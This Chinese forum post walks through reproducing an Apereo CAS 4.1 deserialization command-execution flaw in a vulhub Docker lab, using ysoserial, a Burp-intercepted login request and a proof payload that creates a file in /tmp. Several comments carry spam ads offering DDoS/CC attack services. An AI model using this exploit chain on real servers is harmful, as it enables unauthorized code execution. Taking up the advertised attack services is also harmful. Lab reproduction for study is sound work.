登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
业界
›
Apereo CAS 4.1 反序列化命令执行漏洞 (复现) ...
Apereo CAS 4.1 反序列化命令执行漏洞 (复现)
[ 复制链接 ]
院儿饯
2025-7-28 18:10:38
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
此漏洞需要用到工具Apereo-CAS-Attack,工具地址:https://github.com/vulhub/Apereo-CAS-Attack
还需要下载结合https://github.com/frohoff/ysoserial的CommonsCollections4链生成 Payload
上述工具下载完成后将ysoserial放在工具的根目录里
在根目录下打开终端执行以下命令将 jar 包安装到本地 Maven 仓库
点击查看代码
mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file \
-Dfile=ysoserial-all.jar \
-DgroupId=ysoserial \
-DartifactId=ysoserial \
-Dversion=0.0.6 \
-Dpackaging=jar \
-DlocalRepositoryPath=my-repo
复制代码
命令成功执行!!!
ysoserial会被安装到项目根目录的my-repo文件夹中,供 Maven 构建时引用
执行以下命令安装项目所需环境
点击查看代码
# 更新包列表
sudo apt update
# 安装OpenJDK 8
sudo apt install openjdk-8-jdk -y
# 同样配置javac(编译器)
sudo update-alternatives --config javac
# 选择OpenJDK 8对应的javac路径
#执行以下代码
javac -version
若返回类似javac 1.8.0_xxx,说明 JDK 安装成功
复制代码
执行代码mvn clean package assembly:single -DskipTests构建项目
执行成功示图如上,接下来就可以使用该工具生成payload了
漏洞目录终端下执行docker compose up -d开启容器访问ip:8080
生成恶意 Payload
利用漏洞工具Apereo-CAS-Attack(集成了默认密钥和序列化逻辑)生成加密后的恶意序列化数据
java -jar target/apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/cas_exploit_success"
生成 Payload(利用反序列化执行 touch /tmp/cas_exploit_success)
工具会输出一段 Base64 编码的长字符串;
接下来请出bp(burpsuite)抓包
网站首页使用测试账密test/test,输入后不要登陆!!!
回到bp点击proxy启动代理(浏览器也需要挂上bp的代理),点击登录开始抓包
鼠标右键点击那条POST命令send to repeater,切换到repeater界面
将第一步生成的Base64编码替换成execution参数的内容
点击Send,收到状态码500,不确定漏洞复现没,验证一下
java -jar target/apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/cas_exploit_success"
此命令是在服务器的/tmp目录下创建文件,只需要访问服务器这个位置查看是否成功创建文件即可验证是否成功
文件创建成功,该漏洞成功复现!!!
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
Apereo
CAS
序列化
命令
执行
相关帖子
VonaJS: 序列化/数据脱敏(下)
MySQL EXPLAIN执行计划:SQL性能翻倍的秘密武器
一条SQL的完整执行过程:小明查询"员工信息"的完整冒险故事
windows常见命令
一条SQL在MySQL的执行过程?、MyISAM和InnoDB的区别?
工作中实战sql命令集合
Linux命令自检
具身智能——机械臂全解析:从技术原理到产业生态,解锁智能执行新范式
Linux常用命令查询工具(好记性不如烂笔头)
大疆不同任务类型执行逻辑,上云API源码分析
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
VonaJS: 序列化/数据脱敏(下)
0
848
厥轧匠
2025-11-14
安全
MySQL EXPLAIN执行计划:SQL性能翻倍的秘密武器
0
129
汹萃热
2025-11-17
业界
一条SQL的完整执行过程:小明查询"员工信息"的完整冒险故事
0
378
斜素欣
2025-11-22
安全
windows常见命令
8
830
济曝喊
2025-11-25
业界
一条SQL在MySQL的执行过程?、MyISAM和InnoDB的区别?
0
961
倡遍竽
2025-11-29
安全
工作中实战sql命令集合
0
576
呵桢
2025-12-03
安全
Linux命令自检
3
373
椎蕊
2025-12-07
业界
具身智能——机械臂全解析:从技术原理到产业生态,解锁智能执行新范式
1
26
届表
2025-12-08
安全
Linux常用命令查询工具(好记性不如烂笔头)
0
581
闾丘婉奕
2025-12-12
业界
大疆不同任务类型执行逻辑,上云API源码分析
0
55
迭婵椟
2025-12-12
回复
(4)
睿哝
2025-10-31 01:42:49
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享
宁觅波
2025-11-5 13:19:19
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
不错,里面软件多更新就更好了
章海
4 天前
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
收藏一下 不知道什么时候能用到
龙玮奇
昨天 06:46
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
不错,里面软件多更新就更好了
勺缓曜
1 秒前
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
过来提前占个楼
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
院儿饯
1 秒前
关注
0
粉丝关注
16
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
anyue1937
9994893
kk14977
6845356
3934307807
991123
4
xiangqian
638210
5
韶又彤
9999
6
宋子
9983
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9951
查看更多
今日好文热榜
215
关于renpy游戏小范围QQ群内部测试的一个思
20
Java关键字解析之abstract:抽象的本质、规
444
10GB vs 600MB:我们弃用 GitLab,选择了这
160
Python 潮流周刊#131:从零开始构建智能体
871
flask基础知识深入——会话管理:Flask Ses
106
推荐几款免费免登录无损高质量图片压缩工具
639
玩转 | q群智能聊天机器人 —— MaiBot(麦
991
offline meta-RL | 近期工作速读记录
662
C#AI系列(5): C#离线实现高效OCR
195
这才是vibe coding正确的打开方式 - 手把手
547
huggingface_hub 1.0 正式版现已发布:开源
3
读捍卫隐私05数字照片
832
嵌入式系统内存魔法之分散加载
746
嵌入式系统内存魔法之分散加载
130
【Java】ThreadLocal源码解析
32
观察者模式,发布/订阅模式,与回调函数
700
用 GPT-5.2 Vibe Coding,做了一个可以“玩
937
上海专业防水补漏服务:国家一级资质,免费
359
基于深度学习的无人机视角检测系统演示与介
772
读书笔记 XILINX ug1137-Zynq UltraScale+